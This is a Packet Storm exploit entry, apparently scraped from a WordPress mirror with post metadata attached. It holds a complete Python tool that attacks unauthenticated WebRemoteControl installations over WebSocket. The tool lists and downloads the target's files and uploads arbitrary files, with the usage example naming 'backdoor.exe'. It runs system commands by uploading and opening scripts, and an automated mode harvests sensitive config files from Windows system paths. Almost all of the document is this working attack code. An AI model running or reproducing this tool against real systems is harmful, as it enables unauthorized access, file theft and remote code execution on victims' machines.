{“lastseen”:”2026-06-02T18:25:51″,”description”:”Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution…”,”published”:”2026-06-02T00:00:00″,”modified”:”2026-06-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access”,”source”:””,”references”:””,”id”:”PACKETSTORM:222526″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : WebRemoteControl \u2013 Unauthenticated Remote Filesystem Access \\u0026 Management Interface Assessment Tool |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/github.com\/wolfgangasdf\/WebRemoteControl |\\n ==================================================================================================================================\\n \\n [+] Summary : a security research and assessment tool targeting WebRemoteControl deployments that expose a WebSocket-based remote control interface without authentication. \\n The tool evaluates whether remote users can interact with the application’s file management functionality and access system resources through the exposed service.\\n \\t\\t\\t\\t \\n [+] POC : python 1.py -t 192.168.1.100 –download config.ini\\n -t 192.168.1.100 –auto\\n \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 –command \\”whoami\\”\\n \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 –upload backdoor.exe backdoor.exe\\n \\t\\t\\t\\t\\t\\t\\t -t 192.168.1.100 –list-path \\”\/Windows\/System32\\”\\n \\n #!\/usr\/bin\/env python3\\n \\n import websocket\\n import time\\n import json\\n import os\\n import sys\\n import argparse\\n import base64\\n import threading\\n from datetime import datetime\\n \\n class WebRemoteControlExploit:\\n def __init__(self, target_host, target_port=8000, ssl=False):\\n \\”\\”\\”\\n Initialize WebRemoteControl exploit\\n \\”\\”\\”\\n self.target_host = target_host\\n self.target_port = target_port\\n self.ssl = ssl\\n self.ws_url = f\\”{‘wss’ if ssl else ‘ws’}:\/\/{target_host}:{target_port}\/docs\/cmd\\”\\n self.ws = None\\n self.current_path = \\”\/\\”\\n self.file_cache = {}\\n \\n def connect(self):\\n \\”\\”\\”Establish WebSocket connection\\”\\”\\”\\n try:\\n print(f\\”[*] Connecting to {self.ws_url}\\”)\\n self.ws = websocket.create_connection(self.ws_url, timeout=10)\\n welcome = self.ws.recv()\\n print(f\\”[+] Connected successfully\\”)\\n if welcome:\\n print(f\\”[*] Server response: {welcome[:100]}…\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Failed to connect: {e}\\”)\\n return False\\n \\n def disconnect(self):\\n \\”\\”\\”Close WebSocket connection\\”\\”\\”\\n if self.ws:\\n self.ws.close()\\n print(\\”[*] Connection closed\\”)\\n \\n def send_command(self, command, wait_time=0.5):\\n \\”\\”\\”Send command and receive response\\”\\”\\”\\n try:\\n self.ws.send(command)\\n time.sleep(wait_time)\\n response = self.ws.recv()\\n return response\\n except Exception as e:\\n print(f\\”[-] Command failed: {e}\\”)\\n return None\\n \\n def list_files(self, path=None):\\n \\”\\”\\”List files in current or specified directory\\”\\”\\”\\n if path:\\n original_path = self.current_path\\n self.navigate_to_path(path)\\n \\n response = self.send_command(\\”fbgetfiles\\”, 0.5)\\n \\n if response and response.startswith(\\”fblist\\”):\\n parts = response.split(\\”\\\\t\\”)\\n self.current_path = parts[1]\\n files = parts[2:]\\n \\n print(f\\”\\\\n{‘=’*60}\\”)\\n print(f\\”[PATH] {self.current_path}\\”)\\n print(f\\”{‘=’*60}\\”)\\n \\n for i, item in enumerate(files):\\n is_dir = item.endswith(‘\/’) or item.endswith(‘\\\\\\\\’)\\n icon = \\”\\” if is_dir else \\”\\”\\n print(f\\” [{i:2d}] {icon} {item}\\”)\\n \\n print(f\\”{‘=’*60}\\”)\\n print(f\\”Total: {len(files)} items\\\\n\\”)\\n self.file_cache[self.current_path] = files\\n return files\\n \\n elif response:\\n print(f\\”[!] Unexpected response: {response}\\”)\\n return None\\n else:\\n print(\\”[!] Failed to list files\\”)\\n return None\\n \\n def open_item(self, index):\\n \\”\\”\\”Open folder or execute file by index\\”\\”\\”\\n try:\\n idx = int(index)\\n response = self.send_command(f\\”fbopen\\\\t{idx}\\”, 0.5)\\n \\n if response and response.startswith(\\”fblist\\”):\\n parts = response.split(\\”\\\\t\\”)\\n self.current_path = parts[1]\\n files = parts[2:]\\n print(f\\”[+] Opened folder: {self.current_path}\\”)\\n print(f\\”\\\\n{‘=’*60}\\”)\\n print(f\\”[PATH] {self.current_path}\\”)\\n print(f\\”{‘=’*60}\\”)\\n for i, item in enumerate(files):\\n icon = \\”\\” if (item.endswith(‘\/’) or item.endswith(‘\\\\\\\\’)) else \\”\\”\\n print(f\\” [{i:2d}] {icon} {item}\\”)\\n print(f\\”{‘=’*60}\\\\n\\”)\\n \\n self.file_cache[self.current_path] = files\\n return True\\n \\n elif response:\\n print(f\\”[+] File executed on remote host\\”)\\n print(f\\”[*] Response: {response[:200]}\\”)\\n return True\\n else:\\n print(\\”[!] Failed to open item\\”)\\n return False\\n \\n except ValueError:\\n print(\\”[-] Invalid index. Use numbers only\\”)\\n return False\\n except Exception as e:\\n print(f\\”[-] Error opening item: {e}\\”)\\n return False\\n \\n def go_up(self):\\n \\”\\”\\”Navigate to parent directory\\”\\”\\”\\n response = self.send_command(\\”fbup\\”, 0.5)\\n \\n if response and response.startswith(\\”fblist\\”):\\n parts = response.split(\\”\\\\t\\”)\\n self.current_path = parts[1]\\n files = parts[2:]\\n print(f\\”[+] Moved to parent: {self.current_path}\\”)\\n print(f\\”\\\\n{‘=’*60}\\”)\\n print(f\\”[PATH] {self.current_path}\\”)\\n print(f\\”{‘=’*60}\\”)\\n for i, item in enumerate(files):\\n icon = \\”\\” if (item.endswith(‘\/’) or item.endswith(‘\\\\\\\\’)) else \\”\\”\\n print(f\\” [{i:2d}] {icon} {item}\\”)\\n print(f\\”{‘=’*60}\\\\n\\”)\\n \\n self.file_cache[self.current_path] = files\\n return True\\n else:\\n print(\\”[!] Already at root or cannot go up\\”)\\n return False\\n \\n def navigate_to_path(self, target_path):\\n \\”\\”\\”Navigate to a specific path\\”\\”\\”\\n print(f\\”[*] Navigating to: {target_path}\\”)\\n target_path = target_path.replace(‘\\\\\\\\’, ‘\/’)\\n current_parts = self.current_path.replace(‘\\\\\\\\’, ‘\/’).split(‘\/’)\\n target_parts = target_path.split(‘\/’)\\n common = 0\\n for i in range(min(len(current_parts), len(target_parts))):\\n if current_parts[i] == target_parts[i]:\\n common += 1\\n else:\\n break\\n for _ in range(len(current_parts) – common – 1):\\n if not self.go_up():\\n return False\\n for part in target_parts[common:]:\\n if part and part != ”:\\n files = self.list_files()\\n if not files:\\n return False\\n \\n found = False\\n for i, item in enumerate(files):\\n if item.strip(‘\/\\\\\\\\’) == part:\\n if self.open_item(i):\\n found = True\\n break\\n \\n if not found:\\n print(f\\”[-] Cannot find directory: {part}\\”)\\n return False\\n \\n print(f\\”[+] Successfully navigated to: {self.current_path}\\”)\\n return True\\n \\n def download_file(self, filename):\\n \\”\\”\\”Download file from remote system\\”\\”\\”\\n print(f\\”[*] Attempting to download: {filename}\\”)\\n files = self.list_files()\\n if not files:\\n return False\\n file_index = None\\n for i, item in enumerate(files):\\n if item == filename or item.endswith(filename):\\n file_index = i\\n break\\n \\n if file_index is None:\\n print(f\\”[-] File not found: {filename}\\”)\\n return False\\n print(f\\”[*] Opening file (index {file_index})…\\”)\\n response = self.send_command(f\\”fbopen\\\\t{file_index}\\”, 1)\\n \\n if response:\\n output_file = f\\”downloaded_{filename}\\”\\n with open(output_file, ‘wb’) as f:\\n f.write(response.encode(‘utf-8’))\\n print(f\\”[+] File saved as: {output_file}\\”)\\n return True\\n \\n return False\\n \\n def upload_file(self, local_path, remote_name=None):\\n \\”\\”\\”Upload file to remote system\\”\\”\\”\\n print(f\\”[*] Uploading file: {local_path}\\”)\\n \\n if not os.path.exists(local_path):\\n print(f\\”[-] Local file not found: {local_path}\\”)\\n return False\\n with open(local_path, ‘rb’) as f:\\n content = f.read()\\n encoded = base64.b64encode(content).decode(‘ascii’)\\n remote_name = remote_name or os.path.basename(local_path)\\n command = f\\”fbupload\\\\t{remote_name}\\\\t{encoded}\\”\\n response = self.send_command(command, 2)\\n \\n if response and \\”success\\” in response.lower():\\n print(f\\”[+] File uploaded successfully: {remote_name}\\”)\\n return True\\n else:\\n print(f\\”[-] Upload failed: {response}\\”)\\n return False\\n \\n def execute_command(self, command):\\n \\”\\”\\”Execute system command via file execution\\”\\”\\”\\n print(f\\”[*] Executing command: {command}\\”)\\n if sys.platform == \\”win32\\”:\\n script_name = f\\”temp_{int(time.time())}.bat\\”\\n script_content = f\\”@echo off\\\\n{command}\\\\necho [COMPLETE]\\\\npause\\”\\n else:\\n script_name = f\\”temp_{int(time.time())}.sh\\”\\n script_content = f\\”#!\/bin\/bash\\\\n{command}\\\\necho ‘[COMPLETE]’\\”\\n \\n with open(script_name, ‘w’) as f:\\n f.write(script_content)\\n \\n if self.upload_file(script_name):\\n time.sleep(1)\\n self.list_files()\\n files = self.list_files()\\n for i, item in enumerate(files):\\n if item == script_name:\\n print(f\\”[*] Executing uploaded script…\\”)\\n self.open_item(i)\\n break\\n if os.path.exists(script_name):\\n os.remove(script_name)\\n \\n return True\\n \\n def recursive_list(self, path=\\”\\”, max_depth=3, current_depth=0):\\n \\”\\”\\”Recursively list directory contents\\”\\”\\”\\n if current_depth \\u003e= max_depth:\\n return\\n \\n if path:\\n self.navigate_to_path(path)\\n else:\\n self.list_files()\\n \\n files = self.file_cache.get(self.current_path, [])\\n \\n for i, item in enumerate(files):\\n indent = \\” \\” * current_depth\\n if item.endswith(‘\/’) or item.endswith(‘\\\\\\\\’):\\n print(f\\”{indent} {item}\\”)\\n self.open_item(i)\\n self.recursive_list(\\”\\”, max_depth, current_depth + 1)\\n self.go_up()\\n else:\\n print(f\\”{indent} {item}\\”)\\n \\n def interactive_shell(self):\\n \\”\\”\\”Interactive file browser shell\\”\\”\\”\\n print(\\”\\”\\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 WebRemoteControl – File Browser Exploit \u2551\\n \u2551 Unauthenticated Remote Filesystem Access \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n Commands:\\n list \/ ls – Show current directory contents\\n open \\u003cindex\\u003e – Open folder or execute file\\n up \/ cd.. – Go to parent directory\\n cd \\u003cpath\\u003e – Change to specific directory\\n download \\u003cfilename\\u003e – Download file\\n upload \\u003clocal_file\\u003e – Upload file\\n exec \\u003ccommand\\u003e – Execute system command\\n tree [depth] – Recursive directory listing\\n pwd – Show current path\\n search \\u003cpattern\\u003e – Search for files\\n exit \/ quit – Exit exploit\\n \\n Examples:\\n \\u003e list\\n \\u003e open 5\\n \\u003e cd Windows\/System32\\n \\u003e download config.ini\\n \\u003e upload backup.zip\\n \\u003e exec whoami\\n \\u003e tree 2\\n \\”\\”\\”)\\n \\n while True:\\n try:\\n cmd = input(f\\”\\\\n[{self.current_path}]\\u003e \\”).strip().lower()\\n \\n if not cmd:\\n continue\\n \\n if cmd in [‘list’, ‘ls’]:\\n self.list_files()\\n \\n elif cmd.startswith(‘open’):\\n parts = cmd.split()\\n if len(parts) == 2:\\n self.open_item(parts[1])\\n else:\\n print(\\”Usage: open \\u003cindex\\u003e\\”)\\n \\n elif cmd in [‘up’, ‘cd..’]:\\n self.go_up()\\n \\n elif cmd.startswith(‘cd ‘):\\n target_path = cmd[3:].strip()\\n if target_path == ‘..’:\\n self.go_up()\\n else:\\n self.navigate_to_path(target_path)\\n \\n elif cmd.startswith(‘download ‘):\\n filename = cmd[9:].strip()\\n self.download_file(filename)\\n \\n elif cmd.startswith(‘upload ‘):\\n local_file = cmd[7:].strip()\\n self.upload_file(local_file)\\n \\n elif cmd.startswith(‘exec ‘):\\n command = cmd[5:].strip()\\n self.execute_command(command)\\n \\n elif cmd.startswith(‘tree’):\\n depth = 3\\n if len(cmd.split()) \\u003e 1:\\n try:\\n depth = int(cmd.split()[1])\\n except:\\n pass\\n print(\\”\\\\n[*] Recursive directory listing:\\”)\\n print(\\”=\\”*60)\\n self.recursive_list(\\”\\”, depth)\\n \\n elif cmd == ‘pwd’:\\n print(f\\”Current path: {self.current_path}\\”)\\n \\n elif cmd.startswith(‘search ‘):\\n pattern = cmd[7:].strip()\\n self.search_files(pattern)\\n \\n elif cmd in [‘exit’, ‘quit’]:\\n print(\\”[*] Exiting…\\”)\\n break\\n \\n else:\\n print(\\”Unknown command. Type ‘help’ for available commands\\”)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Interrupted\\”)\\n break\\n except Exception as e:\\n print(f\\”[-] Error: {e}\\”)\\n \\n def search_files(self, pattern):\\n \\”\\”\\”Search for files matching pattern\\”\\”\\”\\n print(f\\”[*] Searching for: {pattern}\\”)\\n found = []\\n \\n def search_recursive(depth=0, max_depth=3):\\n if depth \\u003e= max_depth:\\n return\\n \\n files = self.list_files()\\n if not files:\\n return\\n \\n for i, item in enumerate(files):\\n if pattern.lower() in item.lower():\\n found.append({\\n ‘path’: self.current_path,\\n ‘name’: item,\\n ‘index’: i\\n })\\n \\n if item.endswith(‘\/’) or item.endswith(‘\\\\\\\\’):\\n self.open_item(i)\\n search_recursive(depth + 1, max_depth)\\n self.go_up()\\n original_path = self.current_path\\n search_recursive()\\n \\n if found:\\n print(f\\”\\\\n[+] Found {len(found)} matches:\\”)\\n for match in found:\\n print(f\\” {match[‘path’]}{match[‘name’]} (index {match[‘index’]})\\”)\\n else:\\n print(\\”[-] No matches found\\”)\\n self.navigate_to_path(original_path)\\n \\n def auto_exploit(target_host, target_port=8000):\\n \\”\\”\\”Automated exploit sequence\\”\\”\\”\\n exploit = WebRemoteControlExploit(target_host, target_port)\\n \\n if not exploit.connect():\\n return False\\n \\n print(\\”\\\\n[*] Starting automated exploitation…\\”)\\n print(\\”=\\”*60)\\n exploit.list_files()\\n sensitive_paths = [\\n \\”\/Windows\/System32\/config\\”,\\n \\”\/Users\\”,\\n \\”\/Program Files\\”,\\n \\”\/Windows\/System32\/drivers\/etc\\”,\\n \\”\/inetpub\/wwwroot\\”,\\n \\”\/xampp\/htdocs\\”\\n ]\\n \\n for path in sensitive_paths:\\n print(f\\”\\\\n[*] Checking: {path}\\”)\\n if exploit.navigate_to_path(path):\\n exploit.list_files()\\n sensitive_files = [‘hosts’, ‘config’, ‘.ini’, ‘.conf’, ‘web.config’]\\n files = exploit.file_cache.get(exploit.current_path, [])\\n for file in files:\\n for sensitive in sensitive_files:\\n if sensitive in file.lower():\\n print(f\\”[!] Found sensitive file: {file}\\”)\\n exploit.download_file(file)\\n \\n print(\\”\\\\n[+] Automated exploitation completed\\”)\\n return True\\n \\n def main():\\n parser = argparse.ArgumentParser(description=’WebRemoteControl – Unauthenticated Remote Filesystem Access Exploit’)\\n parser.add_argument(‘-t’, ‘–target’, required=True, help=’Target IP address’)\\n parser.add_argument(‘-p’, ‘–port’, type=int, default=8000, help=’Target port (default: 8000)’)\\n parser.add_argument(‘–ssl’, action=’store_true’, help=’Use WSS instead of WS’)\\n parser.add_argument(‘–auto’, action=’store_true’, help=’Run automated exploitation’)\\n parser.add_argument(‘–command’, help=’Execute single command and exit’)\\n parser.add_argument(‘–download’, help=’Download file from remote system’)\\n parser.add_argument(‘–upload’, nargs=2, metavar=(‘LOCAL’, ‘REMOTE’), help=’Upload file (local remote)’)\\n parser.add_argument(‘–list-path’, help=’List specific path’)\\n \\n args = parser.parse_args()\\n \\n exploit = WebRemoteControlExploit(args.target, args.port, args.ssl)\\n \\n if not exploit.connect():\\n sys.exit(1)\\n if args.command:\\n exploit.execute_command(args.command)\\n exploit.disconnect()\\n sys.exit(0)\\n if args.download:\\n exploit.download_file(args.download)\\n exploit.disconnect()\\n sys.exit(0)\\n if args.upload:\\n local_file, remote_name = args.upload\\n exploit.upload_file(local_file, remote_name)\\n exploit.disconnect()\\n sys.exit(0)\\n if args.list_path:\\n exploit.navigate_to_path(args.list_path)\\n exploit.list_files()\\n exploit.disconnect()\\n sys.exit(0)\\n if args.auto:\\n auto_exploit(args.target, args.port)\\n exploit.disconnect()\\n sys.exit(0)\\n try:\\n exploit.interactive_shell()\\n except KeyboardInterrupt:\\n print(\\”\\\\n[*] Interrupted by user\\”)\\n finally:\\n exploit.disconnect()\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222526″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222526\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-02T18:25:51″,”description”:”Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution…”,”published”:”2026-06-02T00:00:00″,”modified”:”2026-06-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access”,”source”:””,”references”:””,”id”:”PACKETSTORM:222526″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n |…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-59350","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n